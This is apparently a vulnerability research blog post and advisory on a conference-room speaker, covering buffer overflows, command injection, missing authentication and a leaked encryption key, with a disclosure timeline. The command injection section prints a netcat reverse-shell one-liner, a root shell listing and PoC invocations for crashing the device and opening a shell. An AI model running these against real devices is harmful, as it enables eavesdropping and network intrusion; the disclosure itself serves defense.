The walls have ears

Modern business often relies heavily on the Internet and software resources such as Zoom or Skype to support daily operations. Use of such systems often requires additional hardware resources like microphones and cameras. Advances in computing have provided a pathway for these very ordinary hardware commodities to develop into resources that enrich user experience through vast offerings of specialized features or the integration of many discrete devices into a single product. With this progress comes additional risk in product use, because what were once mechanical or analog devices are now increasingly being redesigned with embedded processors. This change in direction implies that what seem like ordinary commodity devices are, in fact, reasonably capable computing machines with attack surfaces very similar to traditional PCs.

GRIMM researchers recently selected one such device, the STEM Audio Table conference room speaker. This blog post details the results of that research, and provides a case study into some of the more common vulnerabilities found in these sorts of devices. This includes unauthenticated remote code execution (RCE) as root, which would allow eavesdropping on conversations if a payload were written to do so.

All of the issues were reported to STEM and their parent company (Shure), and the security team at Shure has said that the latest update fixes all of the reported issues. Automatic updates have been supported since firmware version 1.3, which was released in May of 2020. If you have one of these devices, make sure it is receiving the updates.

Bug identification

Stack Buffer Overflow

  • Location: local_server_get() and sip_config_get() in stem_firmware_linux_2.0.0.out
  • Affected Versions: 2.0.0 - 2.0.1 (latest at the time of research)
  • Impact: Arbitrary Remote Code Execution (RCE) as root
  • CVE Numbers: TBD, TBD

A stack-based buffer can be overrun with user-controlled data in the local_server_get function. This function is responsible for handling user requests to retrieve the “local server” device configuration option. This is done by first requesting that the device set this option to a user-controlled value, followed by an inquiry on what that value is. The storage container for this setting is much larger than the stack buffer size allotted for it while preparing the response packet that will be returned to the user. As such, the contents of the retrieved configuration value will spill onto the surrounding stack due to the use of sprintf to unsafely copy the data contents. Exploitation of this vulnerability could allow attackers to remotely execute arbitrary code as root on the device.

The same pattern used to trigger the buffer overflow of the “local server” setting can similarly be used to exercise a buffer overflow in the handlers responsible for getting and setting Session Initiation Protocol (SIP) configuration options. The function execution flow of sip_config_get is identical to local_server_get, and so the same exploitation pattern as described above can be used. Unbounded sprintf and strcpy calls appear very often in this binary and, as such, likely provide many more buffer overflow opportunities.

Command Injection

  • Location: system_update_now() in stem_firmware_linux_2.0.0.out
  • Affected Versions: 2.0.0 - 2.0.1 (latest at the time of research)
  • Impact: Arbitrary RCE as root
  • CVE Number: TBD

The firmware update mechanism is handled by a Python support script that runs with user-supplied arguments. The system_update_now function handler is responsible for invoking this script as shown:

  sprintf(&command, "python /home/root/Scripts/
  %s %s %s &", url, user, password);

No sanitization is performed on these arguments (“url”, “user”, or “password”) before invoking system to start the Python interpreter. The origin of these three parameters is the entirely user-controlled “local server” device configuration option. Exploitation of this vulnerability gives attackers the ability to execute arbitrary code as root on the device.

Other Miscellaneous Security Concerns

Control Interface Authentication

One of the most damaging findings was that the device was externally controllable with no authentication. The web-based Graphical User Interface (GUI) appeared to be the only mechanism that employed any form of credential enforcement. Authentication should never be a client-side operation, as seemed to be the intent with the STEM Audio Table. After understanding the command structure (see "Sending Commands to STEM Audio Table") it was observed that any operation the GUI was capable of, and more, could be remotely executed without knowing the organization password. Further, if the current password were desired, one need only ask with a special use of the STEM_ORG_LEAVE_REQ command. Altogether, the device can be completely controlled through this unauthenticated interface. A subset of available commands includes:

  • Enable SSH (requires user passwords to login)
  • Factory Reset
  • Get/Set Organization Password
  • Reboot
  • Set Update Server URL
  • Check For Updates
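
For contrast, the kind of server-side check that was missing can be sketched in a few lines. This is a minimal illustration, not the vendor's fix: the command names, the ControlService class, and the choice of PBKDF2 are all assumptions made for the example. The point is only that the device itself, rather than the GUI, decides whether a privileged command may run.

```python
import hashlib
import hmac
import os

# Hypothetical command names, chosen only for illustration.
PRIVILEGED = {"FACTORY_RESET", "REBOOT", "SET_UPDATE_URL"}


def hash_password(password: str, salt: bytes) -> bytes:
    # Store a salted, slow hash so the service never keeps the plaintext.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class ControlService:
    def __init__(self, org_password: str):
        self._salt = os.urandom(16)
        self._stored = hash_password(org_password, self._salt)

    def authorized(self, supplied: str) -> bool:
        candidate = hash_password(supplied, self._salt)
        # Constant-time comparison avoids leaking how many bytes matched.
        return hmac.compare_digest(candidate, self._stored)

    def handle(self, command: str, supplied_password: str = "") -> str:
        # The check happens on the device, before any handler is dispatched.
        if command in PRIVILEGED and not self.authorized(supplied_password):
            return "DENIED"
        return "OK"
```

With a check like this in place, a request such as handle("REBOOT") without the organization password is refused no matter which client sent it.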

Breaking Encryption

During testing, it was observed that communication between the STEM Audio Table device and the web GUI used for configuration was occasionally encrypted. This encryption appeared to be used during particularly sensitive operations like setting user passwords or other types of credentials. However, the device’s logic does not enforce or require such encryption. The same commands can be sent in plaintext and the device will happily handle the request without objection.

Additionally, due to an oversight by developers, the private key associated with the encrypted data is freely available in the firmware update packages. In fact, it can even be downloaded directly from the device.

$ curl

Network traffic is easily decrypted after acquiring this private key.

Update process

While the update process was not researched in depth, it was clear that update packages are unsigned tarballs. At boot, the device checks for a previously downloaded tar file and, if present, extracts it to a fixed location on the filesystem and runs a hardcoded script from within.

The update process appeared to be authenticated with user-supplied credentials if configured to use a “local server” as the source of such updates. This configuration supports installation scenarios where the device is firewalled, or otherwise isolated, from the Internet and so is unable to contact Stem Audio directly for update packages. However, the unauthenticated control interface described in the "Sending Commands to STEM Audio Table" section can be used to enable this update configuration and arbitrarily change the Uniform Resource Locator (URL), username, and password used by the device while checking for updates. As such, an attacker might be able to forge a legitimate update by creating a tarball conforming to an expected naming scheme, hosting it on a fake update server pointed to by the newly configured local-server URL, and forcing an update check (see the "Command Injection" section). In this way, the device would, through its ordinary update process, download an attacker-controlled tarball and execute attacker-controlled scripts from within, thereby achieving RCE.
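
One way to close this gap is to have the device check a package against a trusted value before extracting anything. The sketch below is a simplified stand-in and not the vendor's fix: it compares a SHA-256 digest that is assumed to arrive over a trusted channel, whereas a production design would more likely verify an asymmetric signature. All function names are hypothetical.

```python
import hashlib
import hmac
import io
import tarfile


def make_tarball(files: dict) -> bytes:
    # Helper for the example: build an in-memory tarball from {name: bytes}.
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def verify_package(package: bytes, trusted_sha256_hex: str) -> bool:
    # Assumption: trusted_sha256_hex was obtained out of band (for example
    # from a signed manifest), never from the update server being checked.
    actual = hashlib.sha256(package).hexdigest()
    return hmac.compare_digest(actual, trusted_sha256_hex)


def install_if_trusted(package: bytes, trusted_sha256_hex: str):
    # Refuse to even open the archive unless the digest matches.
    if not verify_package(package, trusted_sha256_hex):
        return None
    with tarfile.open(fileobj=io.BytesIO(package), mode="r") as tar:
        return tar.getnames()
```

A tarball whose contents differ from the trusted package by even one byte produces a different digest, so install_if_trusted returns None instead of listing (or running) anything from it.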

Lack of User Isolation

All services on the STEM Audio Table were observed to be running as root. This implies that an exploited vulnerability in any component of the Stem device may ultimately provide execution in the context of the most privileged user on a Linux machine. A common technique not employed here is to make use of several non-root user accounts that only have access to resources strictly required for their operation, known as the Principle of Least Privilege. In cases where elevated privileges are needed, Interprocess Communication (IPC) to higher privileged services or use of Linux groups will often suffice.
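
As a rough illustration of the technique, a service that needs root only during startup can give up its privileges before it begins handling network input. The sketch below assumes a POSIX system; the drop_privileges name and the osmod parameter (a seam that lets the function be exercised without actually being root) are inventions for this example.

```python
import os


def drop_privileges(uid: int, gid: int, osmod=os) -> bool:
    """Switch the current process from root to an unprivileged uid/gid.

    Returns False, and changes nothing, when the process is not root.
    """
    if osmod.geteuid() != 0:
        return False
    osmod.setgroups([])  # drop supplementary groups first
    osmod.setgid(gid)    # group before user: after setuid this would fail
    osmod.setuid(uid)    # finally give up root itself
    return True
```

The order matters: once setuid has succeeded the process no longer has the rights to change its groups, so the group changes have to come first.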

Technical analysis

Software Architecture

Figure 1: Runtime software components of the STEM Audio Table device and their associated ports

The runtime software architecture of the STEM Audio Table device consists of a single userspace binary hosting a device control service (port 8899) alongside the typical SIP service (port 5060). The control service is routed through a Python WebSocket server that handles in-transit decryption and minor processing of select commands. A majority of commands are forwarded to the backend service provider as depicted in Figure 1.

Sending Commands to STEM Audio Table

The STEM Audio Table device is controllable from external endpoints through the control interface. While “control interface” is not an official term from the vendor, it will be used throughout this analysis to describe the interface through which the STEM Audio Table device can be externally controlled. The control interface listens on port 8899 for commands. The command structure is quite simple, and follows the form:


Where IP seems to be either the device IP or a broadcast address, COMMAND is the desired command, and ARGS are the arguments to the command. It should be noted that the handlers generally expect the arguments to be strings, so including NUL bytes may prematurely terminate the argument data when it is copied around during processing.
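
The NUL-byte caveat is ordinary C string behavior and can be seen from Python with ctypes. This is only a model of how a C string handler would view the bytes, not a reproduction of the device's code, and the as_c_string helper is a name made up for the example.

```python
import ctypes


def as_c_string(payload: bytes) -> bytes:
    # create_string_buffer copies every byte of payload, but .value reads
    # the buffer the way C string functions do: up to the first NUL byte.
    buf = ctypes.create_string_buffer(payload)
    return buf.value
```

For instance, as_c_string(b"http://host\x00/extra") yields b"http://host": everything after the embedded NUL is invisible to string-based handling.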

Stack Buffer Overflows

The vulnerable functions are sip_config_get and local_server_get and exploitation could result in arbitrary code execution. The code below shows the decompiled logic of the local_server_get function.

int local_server_get(void)
{
          char buf[104];
          char *value;

          value = settings_get_value(0x14u);
          // unbounded copy of the user-controlled setting into the 104-byte buf
          sprintf(buf, "STEM_LOCAL_SERVER_URL_GET_RSP:%s;", value);
          return udp_send_message(buf, STACK[0x450]);
}

To exercise the stack overflow one must first set the local server configuration setting and then get the same setting (see below). The data will be copied unbounded into the stack buffer variable buf. Because the STEM Audio Table device’s userspace binaries are not compiled as Position-Independent Executable (PIE), exploitation of this overflow can be used to trigger a Return-Oriented Programming (ROP) execution chain to have some useful effect, like spawning a reverse shell. Note that even userspace libraries dynamically loaded into the process have fixed base addresses, despite being compiled as shared objects that support Address Space Layout Randomization (ASLR).


The ARGS component (See "Sending Commands to STEM Audio Table") in the set command in the snippet above is shown with an ellipsis (“AAAAAA...”). In practice, the length of this data should be long enough to overflow buf and overwrite the return address stored on the stack. For version 2.0.1, this is greater than or equal to 78 bytes of data.
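
The size arithmetic behind the overflow can be checked with a short model. It takes the 104-byte buf and the format string from the decompiled function and counts what sprintf would write; bounded_format then shows, as an assumption about what a fix could look like, how an snprintf-style call would truncate instead. The model covers only the bounds of buf itself and says nothing about where the return address sits on the stack.

```python
BUF_SIZE = 104  # size of buf in the decompiled local_server_get
FORMAT_PREFIX = "STEM_LOCAL_SERVER_URL_GET_RSP:"
FORMAT_SUFFIX = ";"


def bytes_written(value: str) -> int:
    # sprintf writes prefix + value + suffix, then a terminating NUL byte.
    return len(FORMAT_PREFIX) + len(value.encode()) + len(FORMAT_SUFFIX) + 1


def overflows(value: str) -> bool:
    return bytes_written(value) > BUF_SIZE


def bounded_format(value: str, size: int = BUF_SIZE) -> bytes:
    # Model of snprintf(buf, size, ...): at most size - 1 bytes of output
    # are kept, leaving room for the terminating NUL.
    full = (FORMAT_PREFIX + value + FORMAT_SUFFIX).encode()
    return full[: size - 1]
```

Because the fixed parts of the response already take 32 bytes including the terminator, a stored value of 72 bytes fills buf exactly and anything longer is written past its end.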

Note that when the backend service binary stem_firmware_linux_2.0.0.out exits, the system will trigger a reboot in approximately 15 seconds. As such, this vulnerability could additionally be used to crash the backend service process, which would cause the entire device to reboot. Repeating this process would result in a Denial of Service (DoS) attack that would render all local STEM Audio Table devices effectively useless.

The second exploitable stack buffer overflow is located in the sip_config_get function. The vulnerable code follows the same pattern as above (sprintf of user-controlled data) and can be exploited in the same way.

Command Injection

The STEM Audio Table backend service makes extensive use of the system library call. Finding a command injection technique came down to finding cross-references to this library function and the STEM Audio Table code that used it. After a short time, the function system_update_now gave us a lead:

int system_update_now()
{
  int offset;
  char *value;
  char url[];
  char user[];
  char pass[];
  char command[];

  if ( device_normal_op() )
  {
    offset = 0;
    value = settings_get_value(0x14u);
    parse_until_delimiter(value, url, &offset, ";");
    parse_until_delimiter(value, user, &offset, ";");
    parse_until_delimiter(value, pass, &offset, ";");
    // the three user-controlled fields go into the shell command unsanitized
    sprintf(&command, "python /home/root/Scripts/ %s %s %s &",
        url, user, pass);
    if ( system(&command) == -1 )
        handle_error(-250, "system/system.c", 0xEAu);
  }
}

This function takes an arbitrary string from the configuration data and parses out three arguments: url, user, password. It then directly copies each of these into a composite buffer that is then passed to the system library call. If the contents of the 0x14 setting can be set to user-controlled data then we can achieve command injection, and subsequently RCE.
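
The danger of this pattern can be reproduced harmlessly on any POSIX machine. In the sketch below, echo stands in for the updater command line, so the only thing an "injected" command can do is print a word. The three function names are made up for the example, and the quoted and argument-list variants are common mitigations in general, not a description of how the vendor fixed the issue.

```python
import shlex
import subprocess

TEMPLATE = "echo %s %s %s"  # harmless stand-in for the updater command line


def run_unsafe(url: str, user: str, password: str) -> str:
    # Mirrors the sprintf + system pattern: values are pasted into a shell
    # command line, so shell metacharacters inside them are interpreted.
    cmd = TEMPLATE % (url, user, password)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_quoted(url: str, user: str, password: str) -> str:
    # Each value is quoted so the shell treats it as one literal word.
    quoted = tuple(shlex.quote(v) for v in (url, user, password))
    return subprocess.run(TEMPLATE % quoted, shell=True,
                          capture_output=True, text=True).stdout


def run_argv(url: str, user: str, password: str) -> str:
    # No shell at all: the values are passed as separate arguments.
    return subprocess.run(["echo", url, user, password],
                          capture_output=True, text=True).stdout
```

Passing "`echo injected`" as the url makes run_unsafe print the word injected, because the shell ran the embedded command, while run_quoted and run_argv print the backtick string back unchanged.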

Indeed, arbitrary control of the 0x14 setting is possible. This unnamed setting was determined to be associated with the “local server” configuration and can be set by sending the device the following command template:


The code responsible for handling user input does not implement sanitization, so user data is passed as-is into the configuration profile of the device. Later, when this user-supplied value is used in some way, it remains entirely user-controlled. If this user-controlled data is passed to a call to system directly, as the function system_update_now is shown above to do, then back-ticks may be used to spawn sub-shells to run arbitrary commands in the context of the backend service provider. For example, to reboot the device the appropriate setup command is:


Followed by a triggering command that forces the device down this vulnerable code path. It was determined that the vulnerable function was associated with a call tree that starts with the command handler for the following command:


If we first spawn a local listener (e.g. nc -lk $IP $PORT), a reverse shell is achievable by sending the following command as described above (followed by the triggering command):

mkfifo /tmp/a && cat /tmp/a | /bin/sh -i 2>&1 | nc $IP $PORT >/tmp/a

Note the use of && rather than a semi-colon as a shell command separator. Recall that the vulnerable code uses semi-colons as its own internal delimiters and, as such, cannot be used within an injected command. The effect of executing this command after starting the local listener is shown in the following listing:

$ nc -kl 5555
sh: cannot set terminal process group (217): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4# id
uid=0(root) gid=0(root)
sh-4.4# cat /proc/cpuinfo
processor       : 0
model name      : ARM926EJ-S rev 5 (v5l)
BogoMIPS        : 220.92
Features        : swp half thumb fastmult edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant     : 0x0
CPU part        : 0x926
CPU revision    : 5

Hardware        : Generic DA850/OMAP-L138/AM18x
Revision        : 0000
Serial          : 0000000000000000
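
The delimiter constraint noted above can be illustrated with a small model of the parsing step. The behavior of parse_until_delimiter is assumed from its name and call sites in the decompiled code (read up to the next semicolon, then advance past it); the real implementation was not shown, and the Python signature here differs from the C one for convenience.

```python
def parse_until_delimiter(value: str, offset: int, delimiter: str = ";"):
    """Return (field, new_offset), reading from offset to the next delimiter."""
    end = value.find(delimiter, offset)
    if end == -1:
        return value[offset:], len(value)
    return value[offset:end], end + 1


def parse_local_server(value: str):
    # Same three reads as system_update_now: url, then user, then password.
    offset = 0
    fields = []
    for _ in range(3):
        field, offset = parse_until_delimiter(value, offset)
        fields.append(field)
    return tuple(fields)
```

Under this model a url field written as "`a && b`" survives intact, whereas "`a; b`" is cut at the semicolon and its second half lands in the user field, which is why the injected command has to chain with && instead.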


A Python script is provided to interface with the STEM Audio Table device. This script can be used to validate two of the vulnerabilities outlined above: the local_server_get stack overflow and the command injection. Additionally, this script provides functions for interfacing with the device in other ways as an unauthenticated user, including decrypting encrypted messages with the leaked private key, turning the device’s display lights on and off, and factory resetting the device.

To exercise the stack overflow and, as a result, observe a device reboot, the following command can be used where $STEM_IP is the IP address of the STEM Audio Table device:

python3 --ip $STEM_IP --func crash

Once the service crashes, a hardcoded fifteen-second timer begins, after which the device will begin to reboot itself. On boot the device will emit an audible chime. This will be observed roughly two minutes after the forced crash.

The second provided Proof of Concept (PoC) is for the reverse shell shown in the listing above. First, spawn a network listener using nc as shown in that listing, then run:

python3 --ip $STEM_IP --func reverse-shell --args $LOCAL_IP:$LOCAL_PORT

Where $LOCAL_IP and $LOCAL_PORT are the IP and port as specified in the local network listener. Additionally, the --func argument list can be used to see all supported commands and their descriptions.


Voice over Internet Protocol (VoIP) devices like the STEM Audio Table are essentially network-connected microphones. Their compromise, through the described RCE vulnerabilities, could allow attackers to passively eavesdrop on nearby conversations and quietly maintain network persistence. Such a foothold inside an organization provides a stable position for further network operations, data collection, and surveillance from a device that is unlikely to attract much attention. Without proper device isolation in the network, collected data can easily be exfiltrated over the Internet back to attackers.

Beyond the RCE vulnerabilities, the STEM Audio Table device contains numerous other, highly impactful vulnerabilities. Since the device exposes an unauthenticated control interface, network attackers can force the device to perform tasks such as providing device administrator passwords, rebooting the device, and even factory resetting it. Modifying the URL to the update server is another supported task, which would allow an unauthenticated attacker to point the device to a malicious update server. Since the device does not check the signatures of the update (which is just a tarball), an attacker could supply the device with an arbitrary update file.

Additionally, the STEM Audio Table device doesn’t enforce encryption on sensitive operations (e.g. setting user passwords) between the device and its frontend web GUI. Thus, the data exchanged during these operations (e.g. the transmission of credentials) can be read by attackers listening on the local network. Even if the use of encryption were enforced, the device leaks the private key used to protect this data through its firmware update packages. Possession of this key would allow an attacker to decrypt the encrypted traffic between the device and web frontend.

While GRIMM did not analyze all services running on the STEM Audio Table device, it was noted that all of the observed services were running under the root user. The impact of this design decision is that any other exploitable vulnerabilities within these services could provide attackers with root privileges.


This blog post detailed a series of serious security vulnerabilities in the STEM Audio Table conferencing device. The exploitation of these vulnerabilities may allow attackers to passively monitor nearby conversations within an organization as well as offer techniques for achieving persistence within enterprise networks. While GRIMM’s research efforts targeted this particular device, the vulnerabilities and design flaws identified by GRIMM follow similar patterns to vulnerabilities discovered in other networked Video Teleconferencing (VTC) devices throughout the small commodity hardware industry. As such, similar issues are undoubtedly present in related devices such as VoIP phones, network-connected cameras, and many “smart” devices that are part of the Internet of Things (IoT) space.

During product selection and procurement, organizations should take special care to conduct research, to the extent possible, on the security history of a particular product or company. This information comes in many forms, such as manufacturer-specific security advisories, public security advisories, or blog posts from security researchers that previously investigated the product.

Additionally, where possible, organizations should audit devices before deploying their use within company infrastructure. And even then, proper network isolation should be implemented. In this way, the scope of access to the vulnerable devices is limited and, as such, significantly mitigates the risk associated with device use.


  • 04/23/2021 - First attempt to notify vendor (Stem Audio)
  • 04/28/2021 - Second attempt to notify vendor (Stem Audio)
  • 05/07/2021 - Notified parent company (Shure)
  • 06/08/2021 - Final patch released by Stem Audio
  • 06/08/2021 - NotQuite0DayFriday release
  • 06/08/2021 - Blog post release

GRIMM’s Private Vulnerability Disclosure (PVD) program

GRIMM’s Private Vulnerability Disclosure (PVD) program is a subscription-based vulnerability intelligence feed. This high-impact feed serves as a direct pipeline from GRIMM’s vulnerability researchers to its subscribers, facilitating the delivery of actionable intelligence on 0-day threats as they are discovered by GRIMM. We created the PVD program to allow defenders to get ahead of the curve, rather than always having to react to events outside of their control.

The goal of this program is to provide value to subscribers in the following forms:

  • Advanced notice (at least two weeks) of 0-days prior to public disclosure. This affords subscribers time to get mitigations in place before the information is publicly available.
  • In-depth, technical documentation of each vulnerability.
  • PoC vulnerability exploitation code for:
    • Verifying specific configurations are vulnerable
    • Testing defenses to determine their effectiveness in practice
    • Training
      • Blue teams on writing robust mitigations and detections
      • Red teams on the art of exploitation
  • A list of any indicators of compromise
  • A list of actionable mitigations that can be put in place to reduce the risk associated with each vulnerability.

The research is done entirely by GRIMM, and the software and hardware selected by us is based on extensive threat modeling and our team’s deep background in reverse engineering and vulnerability research. Requests to look into specific software or hardware are welcome; however, we cannot guarantee the priority of such requests. In addition to publishing our research to subscribers, GRIMM also privately discloses each vulnerability to its corresponding vendor(s) in an effort to help patch the underlying issues.

If interested in getting more information about the PVD program, reach out to us.
